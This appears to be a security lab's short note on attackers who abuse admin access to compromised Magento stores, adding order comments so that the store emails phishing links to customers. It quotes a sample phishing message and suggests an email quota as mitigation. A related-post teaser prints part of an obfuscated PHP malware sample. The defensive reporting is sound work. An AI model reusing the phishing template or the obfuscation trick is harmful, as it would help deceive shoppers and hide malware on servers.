Magento as a Phishing Spam Sending Tool

Labs Note

The most typical reasons for Magento websites to get compromised are to steal credit card information or to find a way to divert payments to the attackers accounts but recently we have found a completely different objective that can be destructive for the reputation of your website.

When attackers exploit a vulnerability in your store and get admin user permissions, they can easily add new comments to all orders (both completed and pending). Magento emails the comments to customers and hackers abuse this feature to send out phishing emails.

Here is what they currently send out:

<http://www.CompromisedSite .com/>            Your order #100007891 has been updated to: CompleteAttention! Your payment has been declined. Full information -hxxp://www.PhishingDomain .com/eBay/  You can check the status of your orderby logging into your account <https://www.CompromisedSite .com/customer/account/>.

If there are 10,000+ orders on your website, this means that 10,000+ emails will be sent all of a sudden and all of those emails will include a link to a phishing domain. And if an attacker managed to compromised multiple Magento sites, the volume may be comparable to real mass spamming tools. However, in case of emails sent by Magento, the credibility may be higher since people already know the sites they received the emails from and the emails contain their valid order numbers.

There is not much can be done by webmasters once the attackers are in. As a partial mitigation, you can configure your server quota on how many emails can be sent daily, so that only a few number of your customers will actually receive the phishing emails before you notice it.

This kind of attacks can have a very severe impact on your website’s reputation. All your old and regular customers will find out (unless they don’t spot the scam in the emails) that your site is compromised. It shows how important it is to keep your store constantly patched and protected.

You May Also Like

PHP str_replace to hide malware

We found another interesting piece of PHP-based malware on a client site a few days ago: $exg=”JGMnd9J2NvdW50JzskYTnd0kX0ndNPndT0tJRTtpZihyZXNldCgkndYSk9PSdtandCcgJndiYgJGMondJGEpPjM”; $iyo=”GxhndY2UndoYXJyYndXkoJy9bndXlndx3PVxzXS8nLndCcvXHMvndJyksIGFyndcmF5KCcnLCcrJyk”; $ts = str_replace(“b”,””,”bsbtr_brbepblabcbe”); $fy=”sIGpndvaW4oYXJyYXlfc2xpY2UoJndGEndsJGMoJGEpLTndMpKndSkpKTtlYnd2hvICc8LycuJGsnduJz4nO30=”; $sjb=”peyRrPSndd1nddGU0bndSc7ZWNobyAnPCcnduJGsundJz4nO2ndV2YWwoYmFzZndTY0X2RlY29kZShwcmVnX3Jlc”; $dzy =…
Read More